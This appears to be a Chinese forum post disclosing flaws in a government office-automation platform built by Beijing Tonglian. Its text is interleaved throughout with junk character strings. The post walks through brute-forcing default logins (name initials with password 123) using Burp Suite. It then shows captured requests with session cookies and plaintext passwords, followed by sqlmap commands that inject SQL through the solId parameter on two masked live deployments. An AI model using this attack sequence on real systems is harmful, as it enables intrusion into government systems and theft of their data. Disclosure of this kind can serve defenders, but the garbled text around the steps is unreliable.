: Z( C: K/ E' [ , s- R& w7 D3 |( Z+ ^% d; }( G
4 y4 S. ?) C2 L3 k/ A9 A) g* ?( g, d
平台简介:8 F! r: n. U {$ M2 u$ M
k) ~! K7 [1 k% m \6 @
9 l8 X, L0 D X8 D7 \0 C5 J : o% G1 x* O1 M1 M
' @/ k* s. j/ R) }$ P
3 S" T1 N: Q- U. b: U; _ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
7 j% s0 a" F* i2 ?7 L同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 ! I+ `9 S/ h1 G0 o3 J, u3 S
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
' \2 e' m- ^8 H x- v# L7 ^/ s
8 Z6 e1 c+ K' M0 }/ R' A$ \! v7 y! k0 [2 R9 x) w
, u! v6 }" D. x1 z" j) l# D5 R
~5 u) V3 B- A0 ^& ^: `$ a! |: K" W# }" N
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:- n: i- @" o; T4 h2 B$ C
* k2 j& |' t5 K) B. c% |
& ]; Q& z+ ?; @. x/ l# L
, q4 B# H2 @1 n& O. P6 I9 ~( i 3 Y+ _+ L! ]. \$ a
, u$ ^( J9 @& W# }/ l8 V
http://1.1.1.1:7197/cap-aco/#(案例2-)
+ x% W1 q' f4 u# A+ @2 j) @ 1 V8 D- q" w$ l) g+ o! t
" g" _1 H! @: z( K% Y3 \2 Y
http://www.XXOO.com (案例1-官网网站) G0 ]! Q3 b: P* e( F7 c/ h
- B3 `" T2 l; \, s) i- ~/ L$ k" ~% G) Y, k$ t1 W }8 A
9 |" h3 q. e& K+ N5 ~& d; }. _
* c+ G; V( V) _0 V. s' ^0 [2 v8 I7 b: P
漏洞详情:+ a% q* F2 a& i* k
. s3 `* Y2 I L4 H0 L, y. Y: x- {6 E- \# v$ T+ w
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试6 R$ ]5 K7 k% J
2 j& D7 j2 p8 j2 H+ ]) \) F. q$ t1 e6 S8 I8 X
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
! [, o0 G# u" ~' D " P" y. z4 s6 p
6 J3 ], O# v; I( i( A 6 e, [. _8 t) W0 z0 A! }
0 P. J& ?7 _' z9 B# l. J0 x
1 ]' X$ ]4 P7 U3 C) {1 e" l R
" m! c% }. i7 d& y. }' Y 4 K5 ^3 I! B; ?$ P/ p2 j
. c4 Q/ Y) W p- |3 v' S' I8 @
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:& U9 s% z" y: H" k7 f
& }( e; V) k. i T
4 L& E* j' F, w
1、案例1-官方网站
8 _4 j" |& A1 \+ u' E* M6 S) K
2 N T) o! j( T! R2 G" x! A& l) g$ J4 L% B" m1 B1 C
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
9 t! r* k& Z8 r5 c. k; g
& v5 ]0 d$ k! Q9 j" @% @
% Q7 I2 t8 B8 w; k" ^. c Host: www.XXOO.com6 y7 d5 ^+ }0 \6 K
3 l' N6 o2 e2 `# k: ~
0 y% P* i0 C* q3 l
Proxy-Connection: Keep-Alive
6 t1 x' t! w# J4 W) s; G4 Q
4 L2 N$ Q! P& o. T3 }" U6 ~5 z* R3 f4 `! a9 c; r4 x& _
Accept: application/json, text/javascript, */*; q=0.015 U0 J1 D0 M J9 i' N3 _) S; O
$ _+ s! {4 k; F5 U6 b
/ V/ x5 T" [5 x- X+ `1 \4 N+ T Accept-Language: zh-CN
$ v- n% `0 k [* |
7 C9 I6 |. z# e6 q0 F7 A$ O Y' l* x L; M7 S% g9 X
Content-Type: application/json) x, q4 j2 l, d+ d) S% b
& v( c( F* h0 s0 ^6 P+ h, K# @2 g! C" T- I' U3 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
* [* x' Y# ?& C( P; c 2 j, g9 Y7 ?, l$ o+ R* O% C
& M U& J/ m/ Y6 ]4 L8 d' I7 }
X-Requested-With: XMLHttpRequest% _6 b* g6 u3 o- l
; L; O& A/ t ~4 `, t5 t, k, H# x+ Y" G) J! q/ v( r
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
2 [ H1 x3 E0 u5 {" l. W2 P/ l 0 v5 u) K: ~. E" t3 S
! g1 W9 L$ L! E$ M! u9 V6 p
Accept-Encoding: gzip, deflate, sdch
0 |$ g+ U+ ?, }
8 b' K0 ?) i2 j0 m0 a+ f
" z, e* |3 y- e( e K Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
7 k! _4 v( M9 D+ i' q3 S7 t + B0 _4 [- }9 t/ A
- {& G! u# h; i% o# K
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
- q- h0 Z# `3 y) ~! ?5 V2 z
- r H, b7 i2 s. x. `* P' B, ?: H! a* S5 I3 ]8 h
( I- F: u: n# f- s0 w
; ^4 U3 e# Q$ I! Q/ H
z6 n4 a. c! z# l! M& s
; M: ]5 W1 `- _# g5 d' k0 o3 |
, |* j& ~ h: s2 |$ @, Z7 K7 i6 c
4 s0 o6 U( s' r " \. J: j% ^7 _6 F0 m: `8 ?3 O
3 F% S; t3 S- c3 [- h9 O6 H
/ |, J m* w7 {; }
2 J9 I% @4 d( v" h* o9 Q4 _
5 l7 ~2 A3 @* S& R8 Z/ w. ?: f1 s- Y$ o/ i4 d; w. l
2 o2 Z* k! ?3 A; Y: {* Q$ _" Z 0 n8 j: C9 \ D
& R9 D5 \& r' A: {
2、案例2-某天河云平台( U! ~0 d' g- G" d& J2 `
: C- k( k. ? H0 m
& N: o# E: P$ r# a# s
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1+ U( r+ e4 v5 s8 w r& z
; [/ V; K. ^0 h
6 t6 d- P8 }( J8 U/ h
Host: 1.1.1.:7197
3 N3 G+ J% g' n$ k
' n$ G, ~2 D$ m
) D; h& y0 [- \ Accept: application/json, text/javascript, */*; q=0.01
8 W# z" ]7 p. f2 H- m 5 |$ y( Z8 v* K
9 g% F2 `& c% v/ H7 E
X-Requested-With: XMLHttpRequest' x z( l- ^. a/ L
/ `9 r0 K6 ]; U- N& {' V
; ~: E* E( B4 {; m5 h User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
" H% X; |1 S9 b7 e6 V
& d8 x/ N, g' N, z) p$ b$ j% w$ _& }/ I; k* R; I
Content-Type: application/json
* j2 Q$ h/ c/ l7 s& d1 m+ w
# j1 i) j( {1 S0 ~+ W$ d- N- `- f8 ~# h* t. |
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
3 e! X# a6 B' t4 K/ y' h$ Y
0 Q& X: D% t. v% F- T/ f! U% ~* N; x
( s! F0 B: Y, c) C7 M Accept-Language: zh-CN,zh;q=0.8& o, S; V% H7 N6 R+ g! s7 p/ V
j; C. J P( p, A$ {( B
H8 ]& Y+ G9 K, v8 c3 h- |* m; K Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
% m# a! X% u. k : R4 [* {& N8 g5 }
, m& K" C5 L9 x! z' o: n0 P
Connection: close/ h# p# e* s; _/ \4 n7 G: L/ R2 c
: N" A+ k7 D+ z7 e- E8 u+ m$ o$ h2 o& r# A& m0 X) |6 v) z
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
* g% t# Q0 K0 S f+ v% { 1 s# O) d7 ~3 Q! U; Z
$ b9 j' V h* `: m$ _8 E1 G ' j; F" l/ E4 [/ Z! w: b5 g
2 \* p- s7 c, S3 ^* b. U* o, f1 f* J2 Y
: I3 r. B. N$ |0 ^; t * P3 _' J- }1 }( c0 `) o
|